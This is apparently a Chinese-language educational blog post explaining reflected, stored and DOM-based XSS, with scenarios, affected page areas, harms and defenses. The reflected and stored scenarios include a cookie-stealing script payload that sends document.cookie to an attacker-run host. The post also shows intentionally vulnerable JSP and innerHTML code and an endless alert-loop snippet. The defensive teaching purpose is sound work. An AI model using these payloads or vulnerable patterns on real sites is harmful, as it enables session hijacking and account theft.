一、定义

XSS（Cross Site Scripting），翻译过来就是跨站脚本。指的是在用户浏览器上，在渲染DOM树的时候，执行了不可预期的JS脚本，从而发生了安全问题。

XSS属于被动式且用于客户端的攻击方式，所以容易被忽略其危害性。

---

二、XSS类型

反射型XSS

(你提交的恶意数据成功的实现了XSS，但是仅仅是对你这次访问产生了影响，是非持久型攻击)。

存储型XSS

(你提交的数据成功的实现了XSS，存入了数据库或者写入日志，别人访问这个页面的时候就会自动触发)。

DOM型XSS

是一种基于网页DOM结构的攻击，该攻击特点是中招的人是少数人。

---

三、XSS场景

场景1、反射型XSS

1、当张三登录xxx.com后，我发现它的页面某些内容是根据url中的一个叫content参数直接显示的，猜测它测页面处理可能是这样，其它语言类似：

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<!DOCTYPEhtmlPUBLIC"-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">
<html>
    <head>
       <title>XSS测试</title>
    </head>
    <body>
       页面内容：<%=request.getParameter("content")%>
       <!-- 有的页面也常用document.write(' ')输出内容 -->
    </body>
</html>

即页面内容直接回显请求链接的参数值。

2、然后张三从某处知道了阿伟也注册了该网站，并且知道其手机号码/邮箱，

3、然后张三做了一个超链接发给阿伟，超链接地址为：http://www.xxx.com?content=<script>window.open(“www.bbb.com?param=”+document.cookie)</script>

4、当阿伟点击这个链接的时候(假设他已经登录xxx.com)，浏览器就会直接打开bbb.com，并且把Tom在xxx.com中的cookie信息发送到bbb.com。

5、bbb.com是张三搭建的网站，当张三的网站接收到该信息时，张三就盗取了阿伟在xxx.com的cookie信息，cookie信息中可能存有登录密码，攻击成功！

6、这个过程中，受害者只有阿伟自己（攻击特点是中招的人是少数人）。当然，最后阿伟夸张三很刑。

反射型XSS特点是：攻击是一次性的，仅对当次访问产生影响。这种攻击经过后端，不经过数据库。在此攻击过程中，数据走向为：浏览器——>后端回显——>浏览器，故称为反射型。

场景2、存储型XSS

1、张三看到网站（假设是CSDN类发布文章的网站）可以发文章，然后发了一篇凉爽网图的文章。

2、文章某处包含了恶意代码，<script>window.open(“www.bbb.com?param=”+document.cookie)</script>，保存文章。

3、这时有缘人（怨种）Tom和Jack看到了这篇文章，点进来就都中招了，他们的cookie信息都发送到了我的服务器上，攻击成功！

4、这个过程中，受害者是多个人。（ Stored XSS漏洞危害性更大，危害面更广）

存储型XSS特点是会把攻击者的数据存储在服务器端，攻击行为将伴随着攻击数据一直存在。这种攻击经过后端，经过数据库。在此攻击过程中，数据走向为：浏览器—>后端—>数据库—>后端—>浏览器。

场景3、DOM型XSS

DOM XSS直接通过javascript执行，程序并不会返回后台进行处理

常见于类似JSON转换、翻译等工具区

<script>
    function test() {
        var str = document.getElementById("text").value;
        document.getElementById("t").innerHTML = "<a href='"+str+"' >testLink</a>";
    }
</script>
<div id="t" ></div>
<input type="text" id="text" value="" />
<input type="button" id="s" value="write" onclick="test()" />

DOM型XSS特点是不经过后端，通过URL传参触发。在此攻击过程中，数据走向为：URL——>浏览器。

---

四、常见XSS会出现在什么地方？

重灾区：评论区、留言区、个人信息、订单信息等
针对型：站内信、网页即时通讯、私信、意见反馈
存在风险：搜索框、当前目录、图片属性等

存储型XSS会出现在什么地方？

任何可能插入数据库的地方
比如：用户注册的时候
 	       留言板
           上传文件的文件名
          （管理员可见的）报错信息
         	……

---

五、反射型XSS、存储型XSS及DOM型XSS的区别

1、被攻击对象的不同

反射型XSS的被攻击对象一般是攻击者去寻找的，比如场景一的张三盗取阿伟的信息，所以这种攻击范围不是特别的广。

存储型XSS是广撒网的方式或者指定的方式，就是攻击者将存储型XSS放在一些有XSS漏洞的网站上，只要有用户访问这个链接就会中招，而攻击者也可以寻找被攻击对象，比如说上面的例子，所以我们可以看出，存储型XSS的危害性更大，范围更广，可以不需要寻找被攻击对象，只要存储型XSS在服务器上就能实施攻击。

---

六、XSS危害

危害1、信息泄露

• 盗用cookie，窃取敏感信息（包括但不限于账号密码、个人信息）

危害2、未授权操作

• 利用iframe、frame、XMLHttpRequest或flash等方式，以（被攻击）用户的身份执行一些管理操作，如发文章、发私信、加好友甚至转账等非法行为

• 利用可被攻击的域受到其他域信任的特点，以受信任来源的身份请求一些平时不允许的操作，如进行不当的投票活动

危害3、按键记录和钓鱼

• 记录用户在浏览器的操作
• 伪造登录框获取账号密码等信息

危害4、影响体验

• 恶意跳转
• 无法关闭的弹窗

while(true){alert('你关不掉我！');}

---

七、XSS防御

(未查看整理~)

• 对用户向服务器提交的信息（URL、关键字、HTTP头、POST数据等）进行检查，仅接受规定长度、适当格式、预期内容，其余的一律过滤。
• 尽量采用POST而非GET提交表单，任何内容输出到页面之前都必须加以en-code，避免显示出htmltag
• 对用户提交的信息中的link，检查是否有重定向回本站或不是真的图片等可以操作
• 输出前，对关键词或关键字符等进行编码转义的操作

  1、使用可以转义处理在页面上显示的文本的函数，如PHP的htmlentities()或是htmlspecialchars()，Node.js的node-validator
  2、strip_tags()，用于过滤输入和输出中的恶意标签
  3、header()，用于控制json数据的头部（header("Content-type:application/json")）
  4、urlencode()，用于输出处理字符型参数代入页面链接中
  5、intval()，用于处理数值型参数输出页面中
  

• 做session标记、HTTP头检查，以防功能被第三方网站执行
• 确定接收到的内容被规范化，仅包含最小最安全的tag（不含JavaScript），去掉对任何远程内容的引用（尤其是样式表和JavaScript），使用httpOnly的cookie，设置httpOnly为true
• cookie防盗，避免直接在cookie中泄露用户隐私，例如email、密码等；通过使cookie和系统IP绑定来降低cookie泄露后的危险

---

八、更多知识

• 浏览器遵循同源策略（Same Origin Policy）

  同源策略：同域名|IP、同端口、同协议 —— 共用cookie。

  浏览器的同源策略，认为同一个网站，访问同一个东西，限制了不同源的Js，对当前页面的资源和属性的权限。同源策略保护了a.com域名下的资源不被来自其他网页的脚本读取或篡改。

• 腾讯博客： 驱散前端安全梦魇——DOMXSS典型场景分析与修复指南 https://security.tencent.com/index.php/blog/msg/107